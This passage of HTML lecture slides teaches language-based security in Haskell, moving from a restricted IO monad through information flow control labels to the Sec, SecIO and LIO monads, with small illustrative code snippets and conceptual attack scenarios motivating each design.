class="dt">UnsafeRIO</span> <span class="fu">$</span> runRIO m <span class="fu">&gt;&gt;=</span> runRIO <span class="fu">.</span> k<br /><br /><span class="co">-- Returns True iff access is allowed to file name</span><br /><span class="ot">pathOK </span><span class="ot">::</span> <span class="fu">FilePath</span> <span class="ot">-&gt;</span> <span class="dt">IO</span> <span class="dt">Bool</span><br />pathOK file <span class="fu">=</span> <span class="co">{- Implement some policy based on file name -}</span><br /><br /><span class="fu">readFile</span><span class="ot"> </span><span class="ot">::</span> <span class="fu">FilePath</span> <span class="ot">-&gt;</span> <span class="dt">RIO</span> <span class="dt">String</span><br /><span class="fu">readFile</span> file <span class="fu">=</span> <span class="dt">UnsafeRIO</span> <span class="fu">$</span> <span class="kw">do</span><br />  ok <span class="ot">&lt;-</span> pathOK file<br />  <span class="kw">if</span> ok <span class="kw">then</span> Prelude.readFile file <span class="kw">else</span> <span class="fu">return</span> <span class="st">&quot;&quot;</span></code></pre>
<ul>
<li>Note use of <code>newtype</code> -- <code>RIO</code> is same as <code>IO</code> at runtime
<ul>
<li>Anyone can turn an <code>RIO</code> action into an <code>IO</code> one with <code>runRIO</code></li>
<li>But cannot create <code>RIO</code> action from <code>IO</code> one without <code>UnsafeRIO</code> symbol... not exported, so untrusted code cannot bury <code>IO</code> actions in <code>RIO</code> ones</li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="example-policies-for-rio">Example policies for RIO</h1>
<ul>
<li>Only read and write files under some sandbox subdirectory
<ul>
<li>Protect most of file system from untrusted code</li>
</ul></li>
<li>Do not allow execution of other programs
<ul>
<li>Would escape from <code>RIO</code> restrictions</li>
</ul></li>
<li>Only allow connections to port 80, and only to known servers
<ul>
<li>Don't want untrusted code sending spam, attacking mysql, etc.</li>
</ul></li>
<li>Do not allow access to devices
<ul>
<li>Microphone, camera, speaker, etc.</li>
</ul></li>
<li>Similar to policies that apply to Java/JavaScript in browser</li>
</ul>
</div>
<div class="slide">
<h1 id="why-rio-isnt-enough">Why RIO isn't enough</h1>
<ul>
<li>What if the web site contains private data, such as email?</li>
<li>An attack by malicious <code>googleTranslate</code> function:
<ul>
<li>Save a copy of private email under <code>/sandbox</code> (allowed)</li>
<li>When asked to translate a special string, return stored email</li>
<li>Attacker sends himself an email with special string to read stored email</li>
</ul></li>
<li>Another attack
<ul>
<li>Send query to attacker's own website instead of Google</li>
</ul></li>
<li>Problem: really need to keep track of what information is sensitive
<ul>
<li>Okay to send public data over network</li>
<li>Not okay to send email (or maybe only okay to send to specific Google URL)</li>
<li>Okay to write files, but have to keep track of which files contain whose email</li>
</ul></li>
<li>Solution: Decentralized Information Flow Control (DIFC)</li>
</ul>
</div>
<div class="slide">
<h1 id="what-is-difc">What is DIFC?</h1>
<div class="figure">
<img src="lintro.svg" /><p class="caption"></p>
</div>
<ul>
<li>IFC originated with military applications and classified data</li>
<li>Every piece of data in the system has a label</li>
<li>Every process/thread has a label</li>
<li>Labels are partially ordered by <span class="math"> ⊑ </span> (&quot;can flow to&quot;)</li>
<li>Example: Emacs (labeled <span class="math"><em>L</em><sub><em>E</em></sub></span>) accesses file (labeled <span class="math"><em>L</em><sub><em>F</em></sub></span>)</li>
</ul>
</div>
<div class="slide">
<h1 id="what-is-difc-1">What is DIFC?</h1>
<div class="figure">
<img src="lread.svg" /><p class="caption"></p>
</div>
<ul>
<li>IFC originated with military applications and classified data</li>
<li>Every piece of data in the system has a label</li>
<li>Every process/thread has a label</li>
<li>Labels are partially ordered by <span class="math"> ⊑ </span> (&quot;can flow to&quot;)</li>
<li>Example: Emacs (labeled <span class="math"><em>L</em><sub><em>E</em></sub></span>) accesses file (labeled <span class="math"><em>L</em><sub><em>F</em></sub></span>)
<ul>
<li>File read? Information flows from file to emacs. System requires <span class="math"><em>L</em><sub><em>F</em></sub> ⊑ <em>L</em><sub><em>E</em></sub></span>.</li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="what-is-difc-2">What is DIFC?</h1>
<div class="figure">
<img src="lwrite.svg" /><p class="caption"></p>
</div>
<ul>
<li>IFC originated with military applications and classified data</li>
<li>Every piece of data in the system has a label</li>
<li>Every process/thread has a label</li>
<li>Labels are partially ordered by <span class="math"> ⊑ </span> (&quot;can flow to&quot;)</li>
<li>Example: Emacs (labeled <span class="math"><em>L</em><sub><em>E</em></sub></span>) accesses file (labeled <span class="math"><em>L</em><sub><em>F</em></sub></span>)
<ul>
<li>File read? Information flows from file to emacs. System requires <span class="math"><em>L</em><sub><em>F</em></sub> ⊑ <em>L</em><sub><em>E</em></sub></span>.</li>
<li>File write? Information flows in both directions. System enforces that <span class="math"><em>L</em><sub><em>F</em></sub> ⊑ <em>L</em><sub><em>E</em></sub></span> and <span class="math"><em>L</em><sub><em>E</em></sub> ⊑ <em>L</em><sub><em>F</em></sub></span>.</li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="labels-are-transitive">Labels are transitive</h1>
<div class="figure">
<img src="trans1.svg" /><p class="caption"></p>
</div>
<ul>
<li><span class="math"> ⊑ </span> is a transitive relation - makes it easier to reason about security</li>
<li>Example: Label file so it cannot flow to Internet
<ul>
<li>Policy holds regardless of what other software does</li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="labels-are-transitive-1">Labels are transitive</h1>
<div class="figure">
<img src="trans2.svg" /><p class="caption"></p>
</div>
<ul>
<li><span class="math"> ⊑ </span> is a transitive relation - makes it easier to reason about security</li>
<li>Example: Label file so it cannot flow to Internet
<ul>
<li>Policy holds regardless of what other software does</li>
</ul></li>
<li>Suppose a buggy app reads file (e.g., desktop search)</li>
</ul>
</div>
<div class="slide">
<h1 id="labels-are-transitive-2">Labels are transitive</h1>
<div class="figure">
<img src="trans3.svg" /><p class="caption"></p>
</div>
<ul>
<li><span class="math"> ⊑ </span> is a transitive relation - makes it easier to reason about security</li>
<li>Example: Label file so it cannot flow to Internet
<ul>
<li>Policy holds regardless of what other software does</li>
</ul></li>
<li>Suppose a buggy app reads file (e.g., desktop search)
<ul>
<li>Process labeled <span class="math"><em>L</em><sub>bug</sub></span> reads file, so must have <span class="math"><em>L</em><sub><em>F</em></sub> ⊑ <em>L</em><sub>bug</sub></span></li>
<li>But <span class="math"><em>L</em><sub><em>F</em></sub> ⊑ <em>L</em><sub>bug</sub> ∧ <em>L</em><sub>bug</sub> ⊑ <em>L</em><sub>net</sub> ⇒ <em>L</em><sub><em>F</em></sub> ⊑ <em>L</em><sub>net</sub></span>, thus <span class="math"><em>L</em><sub>bug</sub> ! ⊑ <em>L</em><sub>net</sub></span></li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="labels-are-transitive-3">Labels are transitive</h1>
<div class="figure">
<img src="trans4.svg" /><p class="caption"></p>
</div>
<ul>
<li><span class="math"> ⊑ </span> is a transitive relation - makes it easier to reason about security</li>
<li>Example: Label file so it cannot flow to Internet
<ul>
<li>Policy holds regardless of what other software does</li>
</ul></li>
<li>Conversely, any app that can write to network cannot read file</li>
</ul>
</div>
<div class="slide">
<h1 id="labels-form-a-lattice">Labels form a lattice</h1>
<div class="figure">
<img src="ablattice.svg" /><p class="caption"></p>
</div>
<ul>
<li>Consider two users, <span class="math"><em>A</em></span> and <span class="math"><em>B</em></span>
<ul>
<li>Label public data <span class="math"><em>L</em><sub>∅</sub></span>, <span class="math"><em>A</em></span>'s private data <span class="math"><em>L</em><sub><em>A</em></sub></span>, <span class="math"><em>B</em></span>'s private data <span class="math"><em>L</em><sub><em>B</em></sub></span></li>
</ul></li>
<li>What happens if you mix <span class="math"><em>A</em></span>'s and <span class="math"><em>B</em></span>'s private data in a single document?
<ul>
<li>Both <span class="math"><em>A</em></span> and <span class="math"><em>B</em></span> should be concerned about the release of such a document</li>
<li>Need a label at least as restrictive as both <span class="math"><em>L</em><sub><em>A</em></sub></span> and <span class="math"><em>L</em><sub><em>B</em></sub></span></li>
<li>Use the least upper bound (a.k.a. <em>join</em>) of <span class="math"><em>L</em><sub><em>A</em></sub></span> and <span class="math"><em>L</em><sub><em>B</em></sub></span>, written <span class="math"><em>L</em><sub><em>A</em></sub> ⊓ <em>L</em><sub><em>B</em></sub></span></li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="difc-is-decentralized"><strong>D</strong>IFC is <strong>D</strong>ecentralized</h1>
<div class="figure">
<img src="decentralized.svg" /><p class="caption"></p>
</div>
<ul>
<li>Every process has a set of privileges</li>
<li>Exercising privilege <span class="math"><em>p</em></span> changes label requirements
<ul>
<li><span class="math"><em>L</em><sub><em>F</em></sub> ⊑ <sub><em>p</em></sub> <em>L</em><sub>proc</sub></span> to read, and additionally <span class="math"><em>L</em><sub>proc</sub> ⊑ <sub><em>p</em></sub> <em>L</em><sub><em>F</em></sub></span> to write file</li>
<li><span class="math"> ⊑ <sub><em>p</em></sub></span> (``can flow under privileges <span class="math"><em>p</em></span>'') is more permissive than <span class="math"> ⊑ </span></li>
</ul></li>
<li>Idea: Set labels so you know who has relevant privs.</li>
</ul>
</div>
<div class="slide">
<h1 id="example-privileges">Example privileges</h1>
<div class="figure">
<img src="ablattice.svg" /><p class="caption"></p>
</div>
<ul>
<li>Consider again simple two user lattice</li>
<li>Let <span class="math"><em>a</em></span> be user <span class="math"><em>A</em></span>'s privileges, <span class="math"><em>b</em></span> be user <span class="math"><em>B</em></span>'s privileges</li>
<li>Clearly <span class="math"><em>L</em><sub><em>A</em></sub> ⊑ <sub><em>a</em></sub> <em>L</em><sub>∅</sub></span> and <span class="math"><em>L</em><sub><em>B</em></sub> ⊑ <sub><em>b</em></sub> <em>L</em><sub>∅</sub></span>
<ul>
<li>Users should be able to make public or <em>declassify</em> their own private data</li>
</ul></li>
<li>Users should also be able to <em>partially declassify</em> data
<ul>
<li>I.e., <span class="math"><em>L</em><sub><em>A</em><em>B</em></sub> ⊑ <sub><em>a</em></sub> <em>L</em><sub><em>B</em></sub></span> and <span class="math"><em>L</em><sub><em>A</em><em>B</em></sub> ⊑ <sub><em>b</em></sub> <em>L</em><sub><em>A</em></sub></span></li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="the-sec-monad-russo-russo">The <code>Sec</code> monad <a href="http://www.cse.chalmers.se/~russo/seclib.htm">[Russo]</a>, <a href="http://www.cse.chalmers.se/~russo/eci11/lectures/index.shtml">[Russo]</a></h1>
<ul>
<li>Let's encode a really simple two-point lattice in Haskell's type system
<ul>
<li>Let type <code>H</code> represent secret (&quot;high&quot;) data, and <code>L</code> public (&quot;low&quot;) data</li>
</ul>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="dt">Module</span> <span class="dt">Sec</span> <span class="kw">where</span><br /><span class="kw">data</span> <span class="dt">L</span> <span class="fu">=</span> <span class="dt">Lpriv</span><br /><span class="kw">data</span> <span class="dt">H</span> <span class="fu">=</span> <span class="dt">Hpriv</span></code></pre>
<ul>
<li>Type represents secrecy level, constructor represents privileges</li>
</ul>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">{-# LANGUAGE Trustworthy #-}</span><br /><span class="dt">Module</span> <span class="dt">Sec.Safe</span> (<span class="kw">module</span> <span class="dt">Sec</span>) <span class="kw">where</span><br /><span class="kw">import</span> <span class="dt">Sec</span> (<span class="dt">L</span>, <span class="dt">H</span>, <span class="dt">Sec</span>, sec, open, up)</code></pre>
<ul>
<li>Let's also (in module <code>Sec</code>) represent the lattice (<span class="math"><em>L</em> ⊑ <em>H</em></span>) in the type system</li>
</ul>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">class</span> <span class="dt">Flows</span> sl sh <span class="kw">where</span><br /><span class="kw">instance</span> <span class="dt">Flows</span> <span class="dt">L</span> <span class="dt">L</span> <span class="kw">where</span><br /><span class="kw">instance</span> <span class="dt">Flows</span> <span class="dt">L</span> <span class="dt">H</span> <span class="kw">where</span><br /><span class="kw">instance</span> <span class="dt">Flows</span> <span class="dt">H</span> <span class="dt">H</span> <span class="kw">where</span><br /><span class="co">-- Notice no instance for Flows H L</span></code></pre></li>
</ul>
</div>
<div class="slide">
<h1 id="the-sec-monad-continued">The <code>Sec</code> monad (continued)</h1>
<ul>
<li>Let's protect secret values with monads by adding to module <code>Sec</code>
<ul>
<li>Define two monads, <code>Sec H</code> for high data, and <code>Sec L</code> for low data</li>
</ul>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">newtype</span> <span class="dt">Sec</span> s a <span class="fu">=</span> <span class="dt">MkSec</span> a<br /><br /><span class="kw">instance</span> <span class="kw">Monad</span> (<span class="dt">Sec</span> s) <span class="kw">where</span><br />  <span class="fu">return</span> x <span class="fu">=</span> <span class="dt">MkSec</span> x<br />  <span class="dt">MkSec</span> a <span class="fu">&gt;&gt;=</span> k <span class="fu">=</span> k a</code></pre>
<ul>
<li>Allow anyone to label a value, but require privileges to unlabel</li>
</ul>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">label </span><span class="ot">::</span> a <span class="ot">-&gt;</span> <span class="dt">Sec</span> s a<br />label x <span class="fu">=</span> <span class="dt">MkSec</span> x<br /><span class="ot">unlabel </span><span class="ot">::</span> <span class="dt">Sec</span> s a <span class="ot">-&gt;</span> s <span class="ot">-&gt;</span> a<br />unlabel (<span class="dt">MkSec</span> a) s <span class="fu">=</span> s <span class="ot">`seq`</span> a     <span class="co">-- s (H or L) acts like key</span></code></pre>
<ul>
<li>Notice <code>seq</code> call, ensures &quot;<code>unlabel undefined secval</code>&quot; will crash</li>
<li>Allow data to be re-labeled according to <span class="math"> ⊑ </span> relation</li>
</ul>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">relabel </span><span class="ot">::</span> (<span class="dt">Flows</span> lin lout) <span class="ot">=&gt;</span> <span class="dt">Sec</span> lin a <span class="ot">-&gt;</span> <span class="dt">Sec</span> lout a<br />relabel (<span class="dt">MkSec</span> val) <span class="fu">=</span> <span class="dt">MkSec</span> val</code></pre></li>
</ul>
</div>
<div class="slide">
<h1 id="applying-the-sec-monad">Applying the <code>Sec</code> monad</h1>
<ul>
<li>Untrusted code gets access to sensitive data only in <code>Sec</code> monads</li>
<li>Possible policy:
<ul>
<li>Data labeled <code>Sec L</code> can be sent over network</li>
<li>Data labeled <code>Sec H</code> can only be sent to Google</li>
<li>Implement by providing specific trusted functions</li>
</ul>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">queryGoogle </span><span class="ot">::</span> <span class="dt">Sec</span> <span class="dt">H</span> <span class="dt">L.ByteString</span> <span class="ot">-&gt;</span> <span class="dt">IO</span> (<span class="dt">Sec</span> <span class="dt">H</span> <span class="dt">L.ByteString</span>)<br />queryGoogle labeledQuery <span class="fu">=</span> <span class="kw">do</span><br />  <span class="kw">let</span> query <span class="fu">=</span> unlabel <span class="dt">Hpriv</span> labeledQuery  <span class="co">-- code is privileged,</span><br />  <span class="fu">...</span>                                     <span class="co">-- so have Hpriv</span></code></pre></li>
<li>This isn't a very satisfying solution
<ul>
<li>Decision to query google can't depend on data</li>
<li>So we aren't really getting the full benefit of monads (more like <code>Applicative</code>)</li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="io-and-sec"><code>IO</code> and <code>Sec</code></h1>
<ul>
<li><p>What if instead we combined <code>Sec</code> and <code>IO</code>?</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">untrustedTranslate </span><span class="ot">::</span> <span class="dt">Sec</span> <span class="dt">H</span> <span class="dt">L.ByteString</span> <span class="ot">-&gt;</span> <span class="dt">Sec</span> <span class="dt">H</span> (<span class="dt">IO</span> <span class="dt">L.ByteString</span>)</code></pre></li>
<li><p>Safe to run this computation?</p></li>
</ul>
</div>
<div class="slide">
<h1 id="io-and-sec-1"><code>IO</code> and <code>Sec</code></h1>
<ul>
<li><p>What if instead we combined <code>Sec</code> and <code>IO</code>?</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">untrustedTranslate </span><span class="ot">::</span> <span class="dt">Sec</span> <span class="dt">H</span> <span class="dt">L.ByteString</span> <span class="ot">-&gt;</span> <span class="dt">Sec</span> <span class="dt">H</span> (<span class="dt">IO</span> <span class="dt">L.ByteString</span>)</code></pre></li>
<li><p>Safe to run this computation? <strong>No!</strong></p>
<pre class="sourceCode"><code class="sourceCode haskell">untrustedTranslate secbs <span class="fu">=</span> <span class="kw">do</span><br />  bs <span class="ot">&lt;-</span> secbs<br />  <span class="fu">return</span> <span class="fu">$</span> <span class="kw">do</span> <span class="fu">writeFile</span> <span class="st">&quot;PublicFile&quot;</span> bs <span class="co">-- oops, pwned</span><br />              <span class="co">{- query Google for translation -}</span></code></pre></li>
<li><p>Let's combines idea of <code>RIO</code> and <code>Sec</code> in a <code>SecIO</code> monad</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">newtype</span> <span class="dt">SecIO</span> s a <span class="fu">=</span> <span class="dt">MkSecIO</span> (<span class="dt">IO</span> (<span class="dt">Sec</span> s a))<br /><span class="kw">instance</span> <span class="kw">Monad</span> (<span class="dt">SecIO</span> s) <span class="kw">where</span><br />    <span class="fu">return</span> x <span class="fu">=</span> <span class="dt">MkSecIO</span> (<span class="fu">return</span> (<span class="fu">return</span> x))<br />    <span class="dt">MkSecIO</span> m <span class="fu">&gt;&gt;=</span> k <span class="fu">=</span> <span class="dt">MkSecIO</span> <span class="fu">$</span> <span class="kw">do</span><br />      sa <span class="ot">&lt;-</span> m<br />      <span class="kw">let</span> (<span class="dt">MkSec</span> a) <span class="fu">=</span> sa<br />      <span class="kw">let</span> <span class="dt">MkSecIO</span> m' <span class="fu">=</span> k a<br />      m'<br /><span class="ot">run </span><span class="ot">::</span> <span class="dt">SecIO</span> s a <span class="ot">-&gt;</span> <span class="dt">IO</span> (<span class="dt">Sec</span> s a)<br />run (<span class="dt">MkSecIO</span> m) <span class="fu">=</span> m</code></pre></li>
</ul>
</div>
<div class="slide">
<h1 id="the-secio-monad">The <code>SecIO</code> monad</h1>
<ul>
<li><p>What does <code>SecIO</code> mean</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="co">-- Can write to high files and returns high Int</span><br /><span class="ot">c1 </span><span class="ot">::</span> <span class="dt">SecIO</span> <span class="dt">H</span> <span class="dt">Int</span><br /><br /><span class="co">-- Can write to low or high files, returns high Int</span><br /><span class="ot">c2 </span><span class="ot">::</span> <span class="dt">SecIO</span> <span class="dt">L</span> (<span class="dt">Sec</span> <span class="dt">H</span> <span class="dt">Int</span>)<br /><br /><span class="co">-- Can write to low or high files, returns low Int</span><br /><span class="ot">c3 </span><span class="ot">::</span> <span class="dt">SecIO</span> <span class="dt">L</span> <span class="dt">Int</span></code></pre></li>
<li><p>How to represent files?</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="co">-- Must encode level of file in type, path of file in value</span><br /><span class="kw">type</span> <span class="dt">File</span> s <span class="fu">=</span> <span class="dt">SecFilePath</span> <span class="dt">String</span><br /><br /><span class="ot">readFileSecIO </span><span class="ot">::</span> <span class="dt">File</span> s <span class="ot">-&gt;</span> <span class="dt">SecIO</span> s' (<span class="dt">Sec</span> s <span class="dt">String</span>)<br /><span class="ot">writeFileSecIO </span><span class="ot">::</span> <span class="dt">File</span> s <span class="ot">-&gt;</span> <span class="dt">String</span> <span class="ot">-&gt;</span> <span class="dt">SecIO</span> s ()</code></pre>
<ul>
<li>Idea extends to other types of resources (e.g., <code>IORef</code>s)</li>
</ul></li>
</ul>
<!--
    type DataInvariant a = (a -> IO Bool)
    data Loc t s a b = MkLoc t (DataInvariant a) (DataInvariant a)
    type File s = Loc FilePath s String ()
-->

</div>
<div class="slide">
<h1 id="secio-translator"><code>SecIO</code> translator</h1>
<ul>
<li><p>Still need privileged function</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">queryGoogle </span><span class="ot">::</span> <span class="dt">Sec</span> <span class="dt">H</span> <span class="dt">L.ByteString</span> <span class="ot">-&gt;</span> <span class="dt">SecIO</span> <span class="dt">H</span> <span class="dt">L.ByteString</span></code></pre>
<ul>
<li>Represents the fact that Google is trusted with high data</li>
<li>Makes sense you need to implement this to encode policy</li>
</ul></li>
<li><p>Now implement untrusted code as follows</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">untrustedTranslate </span><span class="ot">::</span> <span class="dt">Sec</span> <span class="dt">H</span> <span class="dt">L.ByteString</span> <span class="ot">-&gt;</span> <span class="dt">SecIO</span> <span class="dt">H</span> <span class="dt">L.ByteString</span></code></pre>
<ul>
<li>Function can invoke <code>queryGoogle</code>, but not send data to other places</li>
</ul></li>
<li><code>SecIO</code> does most enforcement at compile time</li>
<li>Problem: for email, really want separate labels for every <em>user</em>
<ul>
<li>Users added dynamically, so hard to encode this with <code>Flows</code>...</li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="lio-monad-stefan"><code>LIO</code> Monad <a href="http://www.cse.chalmers.se/~russo/publications_files/haskell11.pdf">[Stefan]</a></h1>
<ul>
<li>More flexibility if you enforce all permission checks dynamically</li>
<li>Let's define <code>Label</code>s as points on a lattice
<ul>
<li>Can be arbitrary data type with <span class="math"> ⊑ </span>, <span class="math"> ⊓ </span>, and <span class="math"> ⊔ </span></li>
</ul>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">class</span> <span class="kw">Eq</span> a <span class="ot">=&gt;</span> <span class="dt">POrd</span> a <span class="kw">where</span><br /><span class="ot">    leq </span><span class="ot">::</span> a <span class="ot">-&gt;</span> a <span class="ot">-&gt;</span> <span class="dt">Bool</span><br /><span class="kw">class</span> (<span class="dt">POrd</span> a, <span class="kw">Show</span> a, <span class="kw">Read</span> a) <span class="ot">=&gt;</span> <span class="dt">Label</span> a <span class="kw">where</span><br /><span class="ot">    lub </span><span class="ot">::</span> a <span class="ot">-&gt;</span> a <span class="ot">-&gt;</span> a<br /><span class="ot">    glb </span><span class="ot">::</span> a <span class="ot">-&gt;</span> a <span class="ot">-&gt;</span> a</code></pre>
<ul>
<li>Separately, define privileges as any type with <span class="math"> ⊑ <sub><em>p</em></sub></span> for a given label type</li>
</ul>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="co">-- PrivTCB is private class, not exposed to untrusted code</span><br /><span class="kw">class</span> (<span class="dt">Label</span> l, <span class="dt">PrivTCB</span> p) <span class="ot">=&gt;</span> <span class="dt">Priv</span> l p <span class="kw">where</span><br /><span class="ot">    leqp </span><span class="ot">::</span> p <span class="ot">-&gt;</span> l <span class="ot">-&gt;</span> l <span class="ot">-&gt;</span> <span class="dt">Bool</span></code></pre>
<ul>
<li>Note <code>PrivTCB</code> requirement in context--prevents untrusted code from defining instances of <code>Priv</code> class.</li>
</ul></li>
<li>These labels can easily represent many more lattice points
<ul>
<li>E.g., labels can be sets of users whose private data may influence value</li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="need-pure-side-effectful-computations">Need pure, side-effectful computations</h1>
<ul>
<li><p>Represent labeled pure values with type wrapper</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">data</span> <span class="dt">Labeled</span> l t <span class="fu">=</span> <span class="dt">LabeledTCB</span> l t</code></pre>
<ul>
<li>Pure values suitable for mashalling, insertion in database</li>
</ul></li>
<li>The <code>LIO l</code> monad (for <code>Label l</code>) is a state monad w. <em>current</em> label
<ul>
<li>Current label rises to LUB of all data observed</li>
</ul></li>
<li><p>Can label and unlabel pure values in <code>LIO</code> monad:</p>
<pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">label </span><span class="ot">::</span> <span class="dt">Label</span> l <span class="ot">=&gt;</span> l <span class="ot">-&gt;</span> a <span class="ot">-&gt;</span> <span class="dt">LIO</span> l (<span class="dt">Labeled</span> l a)<br /><span class="ot">unlabel </span><span class="ot">::</span> (<span class="dt">Label</span> l) <span class="ot">=&gt;</span> <span class="dt">Labeled</span> l a <span class="ot">-&gt;</span> <span class="dt">LIO</span> l a<br /><span class="ot">unlabelP </span><span class="ot">::</span> <span class="dt">Priv</span> l p <span class="ot">=&gt;</span> p <span class="ot">-&gt;</span> <span class="dt">Labeled</span> l a <span class="ot">-&gt;</span> <span class="dt">LIO</span> l a<br /><span class="ot">toLabeled </span><span class="ot">::</span> (<span class="dt">Label</span> l) <span class="ot">=&gt;</span> l <span class="ot">-&gt;</span> <span class="dt">LIO</span> l a <span class="ot">-&gt;</span> <span class="dt">LIO</span> l (<span class="dt">Labeled</span> l a)</code></pre>
<ul>
<li><code>label</code> requires value label to be above current label</li>
<li><code>unlabel</code> raises current label to LUB with removed <code>Labeled</code> (<code>unlabelP</code> uses privileges to raise label less)</li>
<li><code>toLabeled</code> takes computation that would have raised current label, and instead of raising label, wraps result in <code>Labeled</code></li>
</ul></li>
</ul>
</div>
<div class="slide">
<h1 id="other-lio-features">Other <code>LIO</code> features</h1>
<ul>
<li>Clearance
<ul>
<li>Special label maintained w. current label in <code>LIO</code> state</li>
<li>Represents upper bound on current label</li>
<li>Can lower clearance to label, but raising requires privileges</li>
<li>Allows &quot;need-to-know&quot; policies, reducing danger of covert channels</li>
</ul></li>
<li>Labeled file system
<ul>
<li>Stores labels along with files</li>
</ul></li>
<li>Labeled exceptions
<ul>
<li>Can only catch exceptions thrown at points below your clearance</li>
<li>Get tainted by exception when you catch it</li>
</ul></li>
<li>Research in progress to build web framework using <code>LIO</code>
<ul>
<li>Allows users to upload untrusted applets into web server</li>
</ul></li>
</ul>
</div>
</body>
</html>
